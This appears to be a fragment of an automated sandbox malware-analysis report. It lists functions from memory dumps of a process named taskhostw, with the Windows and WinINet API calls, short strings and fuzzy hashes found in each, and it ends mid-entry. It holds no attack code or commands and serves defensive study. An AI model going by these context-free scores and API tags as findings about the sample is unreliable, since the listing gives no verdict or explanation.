Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: e19fc2df74f7cfb6fc1ff48a2ceadf1873200eb31a77911fa8d76edf02e52a06
Instruction ID: 6ee1760e428f52168f6b1113389f946022ea4379a931859b6ef401e99fea9166
Opcode Fuzzy Hash: e19fc2df74f7cfb6fc1ff48a2ceadf1873200eb31a77911fa8d76edf02e52a06
Instruction Fuzzy Hash: 97E03932904684EAEF615F64FD0DBD83B10EB05332F008366FAA9880E187B14991DF11

Function 00208A3A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,002084BD,?,?,?,0020860E), ref: 00208A43
OpenThreadToken.ADVAPI32(00000000,?,?,?,0020860E), ref: 00208A4A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0020860E), ref: 00208A57
OpenProcessToken.ADVAPI32(00000000,?,?,?,0020860E), ref: 00208A5E

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 425a36d4d5895cc4f726b6a565da12cbb28d9a6dc1d8c5dbc33906bdf929ebb2
Instruction ID: 288dabf2587e0d5fd6da0b3786214c7d129748086c78a91c11adef54e083588d
Opcode Fuzzy Hash: 425a36d4d5895cc4f726b6a565da12cbb28d9a6dc1d8c5dbc33906bdf929ebb2
Instruction Fuzzy Hash: 3DE04F36A05321DFD7A05FB47E0CB573BA8EF50792F044829A685D9095DA2494518750

Function 001F20B6 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 001F20B6
GetDC.USER32(00000000), ref: 001F20C0
GetDeviceCaps.GDI32(00000000,0000000C), ref: 001F20E0
ReleaseDC.USER32(?), ref: 001F2101

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 157f17567d70dcdea47dbaff05661120cf748879009722f593e6e5f1a918f154
Instruction ID: 8ff92462c3144107b95e5951b1caeacf6fb2e6b2b554761cd4ba7007881ae090
Opcode Fuzzy Hash: 157f17567d70dcdea47dbaff05661120cf748879009722f593e6e5f1a918f154
Instruction Fuzzy Hash: 43E0E575800204EFCB419F60EA0DAAD7BB5EB5C310F118026F96AA7220CB3881429F40

Function 001F20CA Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 001F20CA
GetDC.USER32(00000000), ref: 001F20D4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 001F20E0
ReleaseDC.USER32(?), ref: 001F2101

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: d62aa95e410f7d026d4fffa654dbae6a56680c1cb06ff550f5e82c728fc82035
Instruction ID: c45ae44bd686ebe132ea59d9a2b61638cb8493bf2fae896a4226dc3efc420168
Opcode Fuzzy Hash: d62aa95e410f7d026d4fffa654dbae6a56680c1cb06ff550f5e82c728fc82035
Instruction Fuzzy Hash: 26E01A75C00204AFCB419F70EA0DA9D7BF5EB5C310F118025F96AA7220CB3891419F40

Function 001B63A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%$, xrefs: 001B63AE

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID:
String ID: %$
API String ID: 0-817995946
Opcode ID: d8027944e1a65d975550db176c9b58e8ed69683b6c3ce9249da2eb11949dc540
Instruction ID: 147970ea36d4bbc3e7d802a2601c3ba6e291b18c9d4ae698dd627ae7ce054f0f
Opcode Fuzzy Hash: d8027944e1a65d975550db176c9b58e8ed69683b6c3ce9249da2eb11949dc540
Instruction Fuzzy Hash: 14B1F771C002099BCF24EF98C891AFEB7B5FF64350F54412AF906A7295EB389E91CB51

Function 02ACA3B7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 02ACA4C3

Strings

xbL, xrefs: 02ACA525
xbL, xrefs: 02ACA4F9

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: __itow_s
String ID: xbL$xbL
API String ID: 3653519197-3351732020
Opcode ID: 56073d7c24255b46c9ca68ff61e3126421b9fb5d4b911621f3f11c69bd685f99
Instruction ID: 28fc769768b2508ecb68ab3b8cea8c538b82c109e5f50bbcc636d5baddea50ab
Opcode Fuzzy Hash: 56073d7c24255b46c9ca68ff61e3126421b9fb5d4b911621f3f11c69bd685f99
Instruction Fuzzy Hash: 05B15E74A40209EBCB14EF54C990EBAB7BAFF58304F24845DED459B292EF30D981CB60

Function 0022AFB7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 0022B0C3

Strings

xb', xrefs: 0022B125
xb', xrefs: 0022B0F9

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: __itow_s
String ID: xb'$xb'
API String ID: 3653519197-4081426872
Opcode ID: fbcc48ab8cb055f2401ef97dd0b80916748f7886848438a185bd87532c50fdec
Instruction ID: 94d97e49189613ea9b89243750d1ff4905faa16fb775596a19caa8e53db1f85f
Opcode Fuzzy Hash: fbcc48ab8cb055f2401ef97dd0b80916748f7886848438a185bd87532c50fdec
Instruction Fuzzy Hash: 92B1A030A1021AEFCB15DF94D890EEEB7B9FF58300F148559F9459B291EB30EA91CB60

Function 02AA7A38 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 02AA7A7B

Strings

, xrefs: 02AA7A8A

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-3916222277
Opcode ID: d177416e6a454e8b4d6cd960176f58a6f747173ab49f4f5db27cd0289266fd55
Instruction ID: b81ba60907e9922d516d4f0446d26dac4b0c836e32b952aea5b963812fefe8ba
Opcode Fuzzy Hash: d177416e6a454e8b4d6cd960176f58a6f747173ab49f4f5db27cd0289266fd55
Instruction Fuzzy Hash: FF816971900209AFEF119FA4DD94EEFFBB9EF08308F144169F914A7260DB318A19DB60

Function 02A565EB Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON

Download Yara Rule

APIs

_wcscat.LIBCMT ref: 02A8E0F9

Strings

\, xrefs: 02A8E11C

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _wcscat
String ID: \
API String ID: 2563891980-2967466578
Opcode ID: e56d7c4266432a0f4c02bf2e6b1fbb6acfac889eda8ece4603485dfb309dafd5
Instruction ID: 93096702912f859c6a0ce68d77283abd9b9e544d26388f8ef0eb8822fcf2464e
Opcode Fuzzy Hash: e56d7c4266432a0f4c02bf2e6b1fbb6acfac889eda8ece4603485dfb309dafd5
Instruction Fuzzy Hash: 28718B71444311AEC714EF25ED80DABBBE9FF98350B41897EF845831A0EF709948CB5A

Function 02ACE932 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 02ACE95C
_memset.LIBCMT ref: 02ACEA25

Part of subcall function 02A58D97: __itow.LIBCMT ref: 02A58DC2
Part of subcall function 02A58D97: __swprintf.LIBCMT ref: 02A58E0C

Part of subcall function 02A6F206: _wcscpy.LIBCMT ref: 02A6F229

Strings

@, xrefs: 02ACEA39

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _memset$__itow__swprintf_wcscpy
String ID: @
API String ID: 2523036003-2766056989
Opcode ID: b4afbc4ec8ce6098afefaedd6866cb806fa6b13999c5cd6bd0421d5a68627add
Instruction ID: 92e9e6a81eb2cff6886fc3456cddd0a4f5708c974e360cf6727ae3da1126ac59
Opcode Fuzzy Hash: b4afbc4ec8ce6098afefaedd6866cb806fa6b13999c5cd6bd0421d5a68627add
Instruction Fuzzy Hash: 68615CB5A006299FCB14EF64C6849AEBBF6FF48314B14845DE856AB350DF34AD40CF94

Function 001C2AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 001C2AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 001C2AE1

Strings

@, xrefs: 001C2AD5

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 3fd70d5c5b4fe9fccc96bd2b2868206b41a866585cd5f5dcd5502535060769a8
Instruction ID: 5534a2944127aba4351f63dc8f2f2222111c4f0c10e71f6434cf6293b6161d51
Opcode Fuzzy Hash: 3fd70d5c5b4fe9fccc96bd2b2868206b41a866585cd5f5dcd5502535060769a8
Instruction Fuzzy Hash: 8B5146724187449BD320BF20E886BABBBFCFB95314F41885DF2D9511A1DB30856ACB66

Function 001F08CD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 001F08D8

Strings

Dd', xrefs: 001BA2B1
Dd', xrefs: 001BA477

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ClearVariant
String ID: Dd'$Dd'
API String ID: 1473721057-838088433
Opcode ID: dc6c5097cd61ca0cc46811ea2754439b5ccaa7b70d21c7214440a767f96ecee2
Instruction ID: 636b21bf4d66096150843aa490ffc7c02425aa3c3d9d44304593972519703c57
Opcode Fuzzy Hash: dc6c5097cd61ca0cc46811ea2754439b5ccaa7b70d21c7214440a767f96ecee2
Instruction Fuzzy Hash: 175103786083428FD764CF19C494A6ABBF1BF99354FA4885DE9858B321D331EC81CF82

Function 02AD6584 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 02AD659C

Strings

F, xrefs: 02AD6694
0, xrefs: 02AD6592

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _memset
String ID: 0$F
API String ID: 2102423945-3044882817
Opcode ID: 1c0eb870b8700fff3a399a86abb9af46b1e35f470247ba509b19d6def160a180
Instruction ID: d50dc01365c0481e902b8f78fc19dc1940063ffad11bcbb356512241e1a3e9f5
Opcode Fuzzy Hash: 1c0eb870b8700fff3a399a86abb9af46b1e35f470247ba509b19d6def160a180
Instruction Fuzzy Hash: 86415A78A01209EFDB14DF68E888F9A7BB9FF49700F144429E906A7360DB31A914CF54

Function 002226A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002226B4
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 002226EA

Strings

|, xrefs: 002226BB

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: e99a9e1e054f9038a51dbb6451e408a57e00e078de55852f0e384e6cf41bc024
Instruction ID: 83c0f319dc2f02cd487f533952f39abdd534ecbe10175425f2bf5b6f9a518bdb
Opcode Fuzzy Hash: e99a9e1e054f9038a51dbb6451e408a57e00e078de55852f0e384e6cf41bc024
Instruction Fuzzy Hash: B0310571814119AFCF11EFA4DC85EEEBFB9FF18310F100069F815A6266EB325A56DB60

Function 00236A95 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00236B49
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00236B85

Strings

static, xrefs: 00236AE5

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 290310097e6e3457031993daf3b1ed5e1166ca7120c71d64e73850d1975d6505
Instruction ID: c8e3e2877f8be621fe69a77a3d47b6eee01fd17a6b52888f0ff004b387fb488e
Opcode Fuzzy Hash: 290310097e6e3457031993daf3b1ed5e1166ca7120c71d64e73850d1975d6505
Instruction Fuzzy Hash: A5319EB1120605AAEB109F74DC85AFBB7ADFF48724F108619F9A9D7190DB30AC91CB60

Function 00212B9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00212C09
GetMenuItemInfoW.USER32 ref: 00212C44

Strings

0, xrefs: 00212C02

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 98d381d4794c5cf3cde727054fef99aed000f1245124b3a7ce9b390abd17d505
Instruction ID: dc89e48599501c1b02b083c73d5f068539516571122bd25851750ce74d5eb93e
Opcode Fuzzy Hash: 98d381d4794c5cf3cde727054fef99aed000f1245124b3a7ce9b390abd17d505
Instruction Fuzzy Hash: 7431F931510206DFDF348F58D9857DEBBF5EF15350F15401AFA85A61A0D7709AB8CB90

Function 00236706 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00236793
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0023679E

Strings

Combobox, xrefs: 00236760

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: e615d90db14db74b126c84a5999b535ca841ca801fee168cab40af08c8c2944a
Instruction ID: 13d84e923eccf3ad96dcf4e7801aa20fc6e8c4bfdaca76c5593a1d28b7f5ef35
Opcode Fuzzy Hash: e615d90db14db74b126c84a5999b535ca841ca801fee168cab40af08c8c2944a
Instruction Fuzzy Hash: 9411B6B57201097FEF218F54DC89EBB776EEB44368F508124F91497290D6719C718BA0

Function 00236C39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 001B1D35: CreateWindowExW.USER32 ref: 001B1D73
Part of subcall function 001B1D35: GetStockObject.GDI32(00000011), ref: 001B1D87
Part of subcall function 001B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 001B1D91

GetWindowRect.USER32(00000000,?), ref: 00236CA3
GetSysColor.USER32(00000012,?,?,static,?,00000000,?,?,?,00000001,?,?,00000001,?), ref: 00236CBD

Strings

static, xrefs: 00236C80

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: fcc03d34a1477737c49b11fe008ddd0a84f989287f066200ec3e6111e7467f93
Instruction ID: aaef0c83b53c762fa446dccf99224a5f07a54fbe849af4b31e32949e5a45984e
Opcode Fuzzy Hash: fcc03d34a1477737c49b11fe008ddd0a84f989287f066200ec3e6111e7467f93
Instruction Fuzzy Hash: 1F212CB292020AAFDB04DFA8DD49AFABBB8EB08314F015529FD55D3150D735E860DB50

Function 00236952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000,?,?,edit,?,00000000,?,?,?,?,?,?,00000001,?), ref: 002369D4
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002369E3

Strings

edit, xrefs: 002369B8

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: f9c36a47593b8be4eed95fde22eeca87a3b124443c9346814662119dacdd695e
Instruction ID: c8bd8b14ea6f14035f160c825f6cd1bdcffe6cefee67aa1da42a8ec473bbd2a2
Opcode Fuzzy Hash: f9c36a47593b8be4eed95fde22eeca87a3b124443c9346814662119dacdd695e
Instruction Fuzzy Hash: 4B116DB1520205BBEB104E64ED49BEB376DEB05364F518724F9A4971E0C771DCA09B60

Function 00212CA7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00212D1A
GetMenuItemInfoW.USER32 ref: 00212D39

Strings

0, xrefs: 00212D10

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 8f9bca346a2e961f67676928929eac28b6950b1c79da3854a59351b822b01d8c
Instruction ID: 0a90f90f2eb867bd434f0ee14cda7fa2099e52526e0b88bec414e2932113b0e9
Opcode Fuzzy Hash: 8f9bca346a2e961f67676928929eac28b6950b1c79da3854a59351b822b01d8c
Instruction Fuzzy Hash: 9211D331D21125EBCB24DF58E848BDDB7E9AB25300F150122FD15AB2A0E770ADB9C791

Function 002222EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00222342
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0022236B

Strings

<local>, xrefs: 00222333

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

